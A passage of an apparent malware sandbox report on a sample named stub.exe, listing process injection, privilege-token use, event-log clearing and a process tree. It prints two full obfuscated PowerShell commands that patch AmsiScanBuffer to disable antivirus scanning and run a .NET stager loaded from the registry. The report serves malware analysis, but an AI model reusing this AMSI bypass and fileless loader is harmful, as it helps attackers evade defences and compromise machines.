pid Process 4112 stub.exe 4112 stub.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 1284 powershell.EXE 1284 powershell.EXE 3680 taskmgr.exe 1284 powershell.EXE 4544 dllhost.exe 4544 dllhost.exe 4544 dllhost.exe 4544 dllhost.exe 3680 taskmgr.exe 4544 dllhost.exe 4544 dllhost.exe 1548 iexplore.exe 1548 iexplore.exe 4544 dllhost.exe 4544 dllhost.exe 4544 dllhost.exe 4544 dllhost.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 3388 Explorer.EXE 1548 iexplore.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 4112 stub.exe 1548 iexplore.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3680 taskmgr.exe Token: SeSystemProfilePrivilege 3680 taskmgr.exe Token: SeCreateGlobalPrivilege 3680 taskmgr.exe Token: SeDebugPrivilege 1284 powershell.EXE Token: SeDebugPrivilege 1284 powershell.EXE Token: SeDebugPrivilege 4544 dllhost.exe Token: SeShutdownPrivilege 3388 Explorer.EXE Token: SeCreatePagefilePrivilege 3388 Explorer.EXE Token: SeShutdownPrivilege 3388 Explorer.EXE Token: SeCreatePagefilePrivilege 3388 Explorer.EXE Token: 33 3680 taskmgr.exe Token: SeIncBasePriorityPrivilege 3680 taskmgr.exe Token: SeShutdownPrivilege 3388 Explorer.EXE Token: SeCreatePagefilePrivilege 3388 Explorer.EXE Token: SeShutdownPrivilege 3388 Explorer.EXE Token: SeCreatePagefilePrivilege 3388 Explorer.EXE Token: SeShutdownPrivilege 3388 Explorer.EXE Token: SeCreatePagefilePrivilege 3388 Explorer.EXE Token: SeShutdownPrivilege 3388 Explorer.EXE Token: SeCreatePagefilePrivilege 3388 Explorer.EXE Token: SeShutdownPrivilege 3388 Explorer.EXE Token: SeCreatePagefilePrivilege 3388 Explorer.EXE Token: SeShutdownPrivilege 3388 Explorer.EXE Token: SeCreatePagefilePrivilege 3388 Explorer.EXE Token: SeShutdownPrivilege 3388 Explorer.EXE Token: SeCreatePagefilePrivilege 3388 Explorer.EXE Token: SeShutdownPrivilege 3388 Explorer.EXE Token: SeCreatePagefilePrivilege 3388 Explorer.EXE Token: SeShutdownPrivilege 3388 Explorer.EXE Token: SeCreatePagefilePrivilege 3388 Explorer.EXE Token: SeDebugPrivilege 2552 taskmgr.exe Token: SeSystemProfilePrivilege 2552 taskmgr.exe Token: SeCreateGlobalPrivilege 2552 taskmgr.exe Token: SeAuditPrivilege 2220 svchost.exe Token: SeShutdownPrivilege 3388 Explorer.EXE Token: SeCreatePagefilePrivilege 3388 Explorer.EXE Token: SeShutdownPrivilege 3388 Explorer.EXE Token: SeCreatePagefilePrivilege 3388 Explorer.EXE Token: SeShutdownPrivilege 3388 Explorer.EXE Token: SeCreatePagefilePrivilege 3388 Explorer.EXE Token: SeShutdownPrivilege 3388 Explorer.EXE Token: SeCreatePagefilePrivilege 3388 Explorer.EXE Token: SeShutdownPrivilege 3388 Explorer.EXE Token: SeCreatePagefilePrivilege 3388 Explorer.EXE Token: SeShutdownPrivilege 3388 Explorer.EXE Token: SeCreatePagefilePrivilege 3388 Explorer.EXE Token: SeShutdownPrivilege 3388 Explorer.EXE Token: SeCreatePagefilePrivilege 3388 Explorer.EXE Token: SeShutdownPrivilege 3388 Explorer.EXE Token: SeCreatePagefilePrivilege 3388 Explorer.EXE Token: SeShutdownPrivilege 3388 Explorer.EXE Token: SeCreatePagefilePrivilege 3388 Explorer.EXE Token: SeShutdownPrivilege 3388 Explorer.EXE Token: SeCreatePagefilePrivilege 3388 Explorer.EXE Token: SeShutdownPrivilege 3388 Explorer.EXE Token: SeCreatePagefilePrivilege 3388 Explorer.EXE Token: SeShutdownPrivilege 3388 Explorer.EXE Token: SeCreatePagefilePrivilege 3388 Explorer.EXE Token: SeShutdownPrivilege 3388 Explorer.EXE Token: SeCreatePagefilePrivilege 3388 Explorer.EXE Token: SeShutdownPrivilege 3388 Explorer.EXE Token: SeCreatePagefilePrivilege 3388 Explorer.EXE Token: SeShutdownPrivilege 3388 Explorer.EXE Token: SeCreatePagefilePrivilege 3388 Explorer.EXE -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe 3680 taskmgr.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 3388 Explorer.EXE 3388 Explorer.EXE 3388 Explorer.EXE 3388 Explorer.EXE -
Suspicious use of UnmapMainImage 1 IoCs
pid Process 3388 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4112 wrote to memory of 4712 4112 stub.exe 83 PID 4112 wrote to memory of 4712 4112 stub.exe 83 PID 4112 wrote to memory of 4712 4112 stub.exe 83 PID 4712 wrote to memory of 5076 4712 cmd.exe 85 PID 4712 wrote to memory of 5076 4712 cmd.exe 85 PID 4712 wrote to memory of 5076 4712 cmd.exe 85 PID 4112 wrote to memory of 1548 4112 stub.exe 86 PID 4112 wrote to memory of 1548 4112 stub.exe 86 PID 4112 wrote to memory of 1548 4112 stub.exe 86 PID 4112 wrote to memory of 1548 4112 stub.exe 86 PID 1548 wrote to memory of 952 1548 iexplore.exe 87 PID 1548 wrote to memory of 952 1548 iexplore.exe 87 PID 1548 wrote to memory of 952 1548 iexplore.exe 87 PID 1548 wrote to memory of 1272 1548 iexplore.exe 88 PID 1548 wrote to memory of 1272 1548 iexplore.exe 88 PID 1548 wrote to memory of 1272 1548 iexplore.exe 88 PID 1548 wrote to memory of 1272 1548 iexplore.exe 88 PID 952 wrote to memory of 2564 952 cmd.exe 90 PID 952 wrote to memory of 2564 952 cmd.exe 90 PID 952 wrote to memory of 2564 952 cmd.exe 90 PID 1548 wrote to memory of 1080 1548 iexplore.exe 105 PID 1548 wrote to memory of 1080 1548 iexplore.exe 105 PID 1548 wrote to memory of 1080 1548 iexplore.exe 105 PID 1284 wrote to memory of 4544 1284 powershell.EXE 108 PID 1284 wrote to memory of 4544 1284 powershell.EXE 108 PID 1284 wrote to memory of 4544 1284 powershell.EXE 108 PID 1284 wrote to memory of 4544 1284 powershell.EXE 108 PID 1284 wrote to memory of 4544 1284 powershell.EXE 108 PID 1284 wrote to memory of 4544 1284 powershell.EXE 108 PID 1284 wrote to memory of 4544 1284 powershell.EXE 108 PID 1284 wrote to memory of 4544 1284 powershell.EXE 108 PID 4544 wrote to memory of 616 4544 dllhost.exe 5 PID 4544 wrote to memory of 672 4544 dllhost.exe 7 PID 4544 wrote to memory of 964 4544 dllhost.exe 12 PID 4544 wrote to memory of 384 4544 dllhost.exe 13 PID 4544 wrote to memory of 516 4544 dllhost.exe 14 PID 4544 wrote to memory of 928 4544 dllhost.exe 15 PID 4544 wrote to memory of 1124 4544 dllhost.exe 17 PID 4544 wrote to memory of 1132 4544 dllhost.exe 18 PID 4544 wrote to memory of 1160 4544 dllhost.exe 19 PID 4544 wrote to memory of 1172 4544 dllhost.exe 20 PID 4544 wrote to memory of 1252 4544 dllhost.exe 21 PID 4544 wrote to memory of 1304 4544 dllhost.exe 22 PID 4544 wrote to memory of 1376 4544 dllhost.exe 23 PID 4544 wrote to memory of 1388 4544 dllhost.exe 24 PID 4544 wrote to memory of 1500 4544 dllhost.exe 25 PID 4544 wrote to memory of 1528 4544 dllhost.exe 26 PID 4544 wrote to memory of 1540 4544 dllhost.exe 27 PID 4544 wrote to memory of 1664 4544 dllhost.exe 28 PID 4544 wrote to memory of 1720 4544 dllhost.exe 29 PID 4544 wrote to memory of 1728 4544 dllhost.exe 30 PID 4544 wrote to memory of 1812 4544 dllhost.exe 31 PID 4544 wrote to memory of 1820 4544 dllhost.exe 32 PID 4544 wrote to memory of 1940 4544 dllhost.exe 33 PID 4544 wrote to memory of 1996 4544 dllhost.exe 34 PID 4544 wrote to memory of 2004 4544 dllhost.exe 35 PID 4544 wrote to memory of 1696 4544 dllhost.exe 36 PID 4544 wrote to memory of 2012 4544 dllhost.exe 37 PID 4544 wrote to memory of 2068 4544 dllhost.exe 38 PID 4544 wrote to memory of 2220 4544 dllhost.exe 40 PID 4544 wrote to memory of 2376 4544 dllhost.exe 41 PID 4544 wrote to memory of 2412 4544 dllhost.exe 42 PID 4544 wrote to memory of 2452 4544 dllhost.exe 43 PID 4544 wrote to memory of 2572 4544 dllhost.exe 44
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:616
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:384
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{3c578998-491e-4a10-8a45-e2580406724f}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4544
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{4a2787f2-7276-43ba-bc42-99e555bd8850}2⤵PID:5000
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{6047a933-bb1a-4458-8135-ae009c8f730e}2⤵PID:3456
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:672
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:964
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:516
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:928
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1124
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1132
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1160
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1172 -
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:3172
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:iOxQuPNULTDU{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$KirIisyPiyatGc,[Parameter(Position=1)][Type]$klgIRoqiVH)$JTxtkRnEbSm=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+''+'l'+''+'e'+''+'c'+''+[Char](116)+'e'+[Char](100)+''+'D'+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+'a'+''+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+[Char](109)+''+'o'+'r'+[Char](121)+''+[Char](77)+'o'+'d'+'ule',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+'e'+''+'l'+''+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+'e'+'T'+[Char](121)+'p'+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+','+[Char](80)+'ub'+[Char](108)+''+[Char](105)+'c,'+'S'+'ea'+[Char](108)+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+'A'+'n'+[Char](115)+'iCla'+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+'u'+[Char](116)+''+'o'+'C'+[Char](108)+''+'a'+'s'+'s'+'',[MulticastDelegate]);$JTxtkRnEbSm.DefineConstructor('RTSpe'+[Char](99)+'ial'+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+''+','+'H'+[Char](105)+''+'d'+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+','+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$KirIisyPiyatGc).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+'t'+''+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+'Ma'+'n'+'a'+[Char](103)+''+[Char](101)+''+'d'+'');$JTxtkRnEbSm.DefineMethod(''+[Char](73)+''+[Char](110)+'v'+[Char](111)+''+'k'+'e',''+[Char](80)+''+'u'+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+',Hid'+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+'g'+''+[Char](44)+'N'+[Char](101)+''+[Char](119)+''+[Char](83)+'l'+'o'+''+'t'+''+[Char](44)+'V'+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+'a'+[Char](108)+'',$klgIRoqiVH,$KirIisyPiyatGc).SetImplementationFlags('R'+[Char](117)+'n'+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+'n'+'a'+[Char](103)+'e'+[Char](100)+'');Write-Output $JTxtkRnEbSm.CreateType();}$wpDBBANUXENMj=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+'st'+[Char](101)+''+[Char](109)+''+'.'+'dl'+[Char](108)+'')}).GetType(''+'M'+'ic'+[Char](114)+''+[Char](111)+'s'+'o'+''+[Char](102)+''+'t'+''+[Char](46)+'W'+[Char](105)+'n'+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+'f'+'e'+[Char](78)+''+'a'+'t'+[Char](105)+'veM'+[Char](101)+''+[Char](116)+''+[Char](104)+''+'o'+''+[Char](100)+''+[Char](115)+'');$KqRQrbBeZveBQU=$wpDBBANUXENMj.GetMethod(''+[Char](71)+''+'e'+''+'t'+''+[Char](80)+''+'r'+''+[Char](111)+''+'c'+''+'A'+''+'d'+''+[Char](100)+''+[Char](114)+''+[Char](101)+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+'u'+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+'t'+'i'+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ogIFJGYTbSmJwGlNJYg=iOxQuPNULTDU @([String])([IntPtr]);$NUVsUexWtHcBWohJIaszVS=iOxQuPNULTDU @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$hoMhJNWBSVU=$wpDBBANUXENMj.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+'Mo'+[Char](100)+'ul'+'e'+''+'H'+''+[Char](97)+''+[Char](110)+''+'d'+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+[Char](101)+''+[Char](114)+''+'n'+''+'e'+''+'l'+''+'3'+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+'l'+'l')));$amoPIoJGWFScfS=$KqRQrbBeZveBQU.Invoke($Null,@([Object]$hoMhJNWBSVU,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+'L'+'i'+''+[Char](98)+''+'r'+'ar'+[Char](121)+''+[Char](65)+'')));$GGAxqtznhUJbCiDpV=$KqRQrbBeZveBQU.Invoke($Null,@([Object]$hoMhJNWBSVU,[Object]('Vir'+[Char](116)+''+[Char](117)+'a'+[Char](108)+''+[Char](80)+'r'+'o'+''+[Char](116)+''+'e'+''+[Char](99)+''+[Char](116)+'')));$yXBVIEC=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($amoPIoJGWFScfS,$ogIFJGYTbSmJwGlNJYg).Invoke(''+'a'+''+'m'+''+'s'+''+[Char](105)+''+'.'+''+'d'+'l'+[Char](108)+'');$nUYMNDjjagDHGLINt=$KqRQrbBeZveBQU.Invoke($Null,@([Object]$yXBVIEC,[Object](''+[Char](65)+''+[Char](109)+''+'s'+''+[Char](105)+''+[Char](83)+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+'B'+''+[Char](117)+''+[Char](102)+''+[Char](102)+''+[Char](101)+'r')));$XUNwXRMYoZ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GGAxqtznhUJbCiDpV,$NUVsUexWtHcBWohJIaszVS).Invoke($nUYMNDjjagDHGLINt,[uint32]8,4,[ref]$XUNwXRMYoZ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$nUYMNDjjagDHGLINt,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GGAxqtznhUJbCiDpV,$NUVsUexWtHcBWohJIaszVS).Invoke($nUYMNDjjagDHGLINt,[uint32]8,0x20,[ref]$XUNwXRMYoZ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+'FT'+[Char](87)+'A'+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](36)+'77'+[Char](115)+''+[Char](116)+''+[Char](97)+''+[Char](103)+'e'+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1284
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:JpYzqWbCwqal{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$QFYASQWJZFRuDE,[Parameter(Position=1)][Type]$wMONfgPaLq)$oQKUqbAOTZU=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'ef'+'l'+''+'e'+''+[Char](99)+''+[Char](116)+''+'e'+''+'d'+''+[Char](68)+''+'e'+''+'l'+'e'+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+''+'e'+'m'+[Char](111)+''+[Char](114)+'y'+'M'+''+[Char](111)+''+'d'+''+[Char](117)+'le',$False).DefineType(''+'M'+'y'+[Char](68)+''+[Char](101)+'le'+'g'+''+[Char](97)+''+'t'+''+[Char](101)+''+'T'+''+[Char](121)+'p'+[Char](101)+'','Cla'+[Char](115)+'s,'+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+''+','+''+'S'+''+'e'+''+[Char](97)+''+[Char](108)+'e'+[Char](100)+''+[Char](44)+''+[Char](65)+''+'n'+'s'+[Char](105)+'C'+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+'Au'+'t'+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$oQKUqbAOTZU.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+'p'+'e'+'c'+[Char](105)+''+'a'+''+'l'+''+'N'+''+[Char](97)+''+'m'+'e'+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+'e'+''+[Char](66)+''+[Char](121)+'S'+[Char](105)+'g'+[Char](44)+'Pu'+[Char](98)+''+'l'+'i'+'c'+'',[Reflection.CallingConventions]::Standard,$QFYASQWJZFRuDE).SetImplementationFlags('R'+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+'Ma'+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$oQKUqbAOTZU.DefineMethod(''+[Char](73)+''+'n'+'v'+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+'P'+'u'+'b'+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+'H'+''+'i'+''+'d'+''+'e'+''+[Char](66)+''+'y'+'Si'+[Char](103)+''+','+''+'N'+'e'+[Char](119)+''+[Char](83)+'l'+'o'+''+'t'+''+[Char](44)+''+'V'+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+''+'l'+'',$wMONfgPaLq,$QFYASQWJZFRuDE).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+'t'+'i'+[Char](109)+''+'e'+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+''+'e'+''+[Char](100)+'');Write-Output $oQKUqbAOTZU.CreateType();}$IIRlNsZYRXgUY=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+''+'t'+''+[Char](101)+''+'m'+''+[Char](46)+'d'+[Char](108)+'l')}).GetType(''+'M'+''+'i'+''+[Char](99)+''+'r'+''+[Char](111)+''+[Char](115)+'of'+'t'+'.W'+'i'+'n'+'3'+'2'+[Char](46)+''+[Char](85)+''+[Char](110)+''+[Char](115)+'a'+'f'+'e'+'N'+''+[Char](97)+''+'t'+''+[Char](105)+''+[Char](118)+''+'e'+'M'+[Char](101)+'tho'+'d'+''+[Char](115)+'');$ysTSwBCOwFvWXi=$IIRlNsZYRXgUY.GetMethod(''+'G'+'et'+[Char](80)+'roc'+[Char](65)+''+'d'+''+[Char](100)+''+[Char](114)+'e'+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+'li'+'c'+',S'+'t'+''+[Char](97)+''+[Char](116)+'i'+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$TeXhnKZAWzDLQThJwCO=JpYzqWbCwqal @([String])([IntPtr]);$pOJuHWfftnjzjkcHLZpgvs=JpYzqWbCwqal @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$cATqXkQwQtC=$IIRlNsZYRXgUY.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+'M'+''+[Char](111)+'d'+[Char](117)+'l'+[Char](101)+'H'+'a'+''+[Char](110)+'dl'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+''+[Char](110)+''+'e'+''+'l'+''+[Char](51)+'2'+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$DkvVqlGcwkANla=$ysTSwBCOwFvWXi.Invoke($Null,@([Object]$cATqXkQwQtC,[Object](''+'L'+'o'+'a'+''+'d'+'L'+[Char](105)+''+[Char](98)+''+'r'+''+[Char](97)+'r'+[Char](121)+''+[Char](65)+'')));$ZNMJTdqZXkGeVqFfl=$ysTSwBCOwFvWXi.Invoke($Null,@([Object]$cATqXkQwQtC,[Object](''+[Char](86)+'i'+'r'+''+[Char](116)+'ua'+[Char](108)+''+'P'+'r'+'o'+''+'t'+''+[Char](101)+''+'c'+''+[Char](116)+'')));$TsOJNmc=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DkvVqlGcwkANla,$TeXhnKZAWzDLQThJwCO).Invoke(''+[Char](97)+'m'+[Char](115)+''+[Char](105)+''+[Char](46)+''+'d'+''+[Char](108)+'l');$EEjerhijVWrpiJpUf=$ysTSwBCOwFvWXi.Invoke($Null,@([Object]$TsOJNmc,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+[Char](66)+''+[Char](117)+''+[Char](102)+''+[Char](102)+'e'+[Char](114)+'')));$fsuWCmDTpc=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ZNMJTdqZXkGeVqFfl,$pOJuHWfftnjzjkcHLZpgvs).Invoke($EEjerhijVWrpiJpUf,[uint32]8,4,[ref]$fsuWCmDTpc);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$EEjerhijVWrpiJpUf,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ZNMJTdqZXkGeVqFfl,$pOJuHWfftnjzjkcHLZpgvs).Invoke($EEjerhijVWrpiJpUf,[uint32]8,0x20,[ref]$fsuWCmDTpc);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+''+[Char](84)+''+'W'+'A'+'R'+''+[Char](69)+'').GetValue(''+'$'+''+[Char](55)+'7'+'s'+''+[Char](116)+''+[Char](97)+'g'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
PID:3188 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:688
-
-
-
